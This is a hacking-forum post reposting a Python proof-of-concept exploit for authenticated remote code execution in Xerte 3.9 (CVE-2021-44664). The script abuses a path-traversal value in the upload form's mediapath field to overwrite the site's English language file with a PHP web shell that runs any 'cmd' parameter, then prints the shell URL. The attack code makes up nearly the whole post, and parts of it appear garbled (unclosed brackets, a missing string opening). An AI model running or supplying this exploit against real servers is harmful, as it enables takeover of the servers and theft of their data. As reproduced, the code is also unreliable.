Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Xerte 3.9 - Remote Code Execution (RCE) (Authenticated)



Recommended Posts

# Exploit Title: Xerte 3.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 05/03/2021
# Exploit Author: Rik Lutz
# Vendor Homepage: https://xerte.org.uk
# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.8.5-33.zip
# Version: up until version 3.9
# Tested on: Windows 10 XAMP 
# CVE : CVE-2021-44664

# This PoC assumes guest login is enabled and the en-GB langues files are used. 
# This PoC wil overwrite the existing langues file (.inc) for the englisch index page with a shell.
# Vulnerable url: https://<host>/website_code/php/import/fileupload.php
# The mediapath variable can be used to set the destination of the uploaded.
# Create new project from template -> visit "Properties" (! symbol) -> Media and Quota

import requests
import re

xerte_base_url = ""
php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here.

with requests.Session() as session:
    # Get a PHP session ID
    if not php_session_id:
        session.cookies.set("PHPSESSID", php_session_id)

     # Use a default template
    data = {
        'tutorialid': 'Nottingham',
        'templatename': 'Nottingham',
        'tutorialname': 'exploit',
        'folder_id': ''

    # Create a new project in order to find the install path
    template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data)

    # Find template ID
    data = {
        'template_id': re.findall('(\d+)', template_id.text)[0]

    # Find the install path:
    install_path = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data)
    install_path = re.findall('mediapath" value="(.+?)"', install_path.text)[0]

    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'nl,en-US;q=0.7,en;q=0.3',
        'Content-Type': 'multipart/form-data; boundary=---------------------------170331411929658976061651588978',

    # index.inc file
    data = \
Content-Disposition: form-data; name="filenameuploaded"; filename="index.inc"
Content-Type: application/octet-stream

if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }
 * index.php english language file
 * @author Patrick Lockley
 * @version 1.0
 * @copyright Pat Lockley
 * @package

define("INDEX_USERNAME_AND_PASSWORD_EMPTY", "Please enter your username and password");

define("INDEX_USERNAME_EMPTY", "Please enter your username");

define("INDEX_PASSWORD_EMPTY", "Please enter your password");

define("INDEX_LDAP_MISSING", "PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available");

define("INDEX_SITE_ADMIN", "Site admins should log on on the manangement page");

define("INDEX_LOGON_FAIL", "Sorry that password combination was not correct");

define("INDEX_LOGIN", "login area");

define("INDEX_USERNAME", "Username");

define("INDEX_PASSWORD", "Password");

define("INDEX_HELP_TITLE", "Getting Started");

define("INDEX_HELP_INTRODUCTION", "We\'ve produced a short introduction to the Toolkits website.");

define("INDEX_HELP_INTRO_LINK_TEXT","Show me!");

define("INDEX_NO_LDAP","PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available");

define("INDEX_FOLDER_PROMPT","What would you like to call your folder?");

define("INDEX_WORKSPACE_TITLE","My Projects");

define("INDEX_CREATE","Project Templates");

define("INDEX_DETAILS","Project Details");



define("INDEX_SORT_A","Alphabetical A-Z");

define("INDEX_SORT_Z","Alphabetical Z-A");

define("INDEX_SORT_NEW","Age (New to Old)");

define("INDEX_SORT_OLD","Age (Old to New)");

define("INDEX_LOG_OUT","Log out");

define("INDEX_LOGGED_IN_AS","Logged in as");





define("INDEX_BUTTON_PREVIEW", "Preview");

define("INDEX_BUTTON_SORT", "Sort");

define("INDEX_BUTTON_NEWFOLDER", "New Folder");


define("INDEX_BUTTON_DELETE", "Delete");

define("INDEX_BUTTON_DUPLICATE", "Duplicate");

define("INDEX_BUTTON_PUBLISH", "Publish");

define("INDEX_BUTTON_CANCEL", "Cancel");

define("INDEX_BUTTON_SAVE", "Save");



define("INDEX_XAPI_DASHBOARD_GROUP_SELECT", "Select group:");

define("INDEX_XAPI_DASHBOARD_GROUP_ALL", "All groups");

define("INDEX_XAPI_DASHBOARD_SHOW_NAMES", "Show names and/or email addresses");

define("INDEX_XAPI_DASHBOARD_CLOSE", "Close dashboard");

define("INDEX_XAPI_DASHBOARD_DISPLAY_OPTIONS", "Display options");

define("INDEX_XAPI_DASHBOARD_SHOW_HIDE_COLUMNS", "Show / hide columns");

define("INDEX_XAPI_DASHBOARD_QUESTION_OVERVIEW", "Interaction overview");

Content-Disposition: form-data; name="mediapath"

''' \
    + install_path \
    + '''../../../languages/en-GB/

    # Overwrite index.inc file
    response = session.post(xerte_base_url + '/website_code/php/import/fileupload.php', headers=headers, data=data)
    print('Installation path: ' + install_path)
    if "success" in response.text:
        print("Visit shell @: " + xerte_base_url + '/?cmd=whoami')
Link to post
Link to comment
Share on other sites


discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    • Create New...